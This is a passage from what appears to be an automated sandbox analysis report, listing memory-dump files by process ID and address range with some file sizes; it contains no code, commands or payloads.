                                                                                                          • memory/4928-302-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4964-246-0x00000000005B0000-0x00000000005C2000-memory.dmp
                                                                                                            Filesize

                                                                                                            72KB

                                                                                                          • memory/4964-242-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4964-245-0x0000000000580000-0x0000000000590000-memory.dmp
                                                                                                            Filesize

                                                                                                            64KB

                                                                                                          • memory/5044-254-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5136-350-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5172-360-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5200-321-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5300-330-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5332-332-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5440-361-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5452-351-0x0000000000402F68-mapping.dmp
                                                                                                          • memory/5500-333-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5516-334-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5548-362-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5596-353-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5604-359-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5692-356-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5716-336-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5764-358-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5848-339-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5852-363-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5856-357-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5864-347-0x0000000007030000-0x0000000007031000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/5864-346-0x00000000069C0000-0x00000000069C1000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/5864-340-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5900-364-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5968-343-0x0000000000000000-mapping.dmp
                                                                                                          • memory/6008-369-0x0000000000000000-mapping.dmp
                                                                                                          • memory/6080-348-0x0000000000000000-mapping.dmp
                                                                                                          • memory/6092-352-0x0000000000000000-mapping.dmp
                                                                                                          • memory/6132-368-0x0000000000000000-mapping.dmp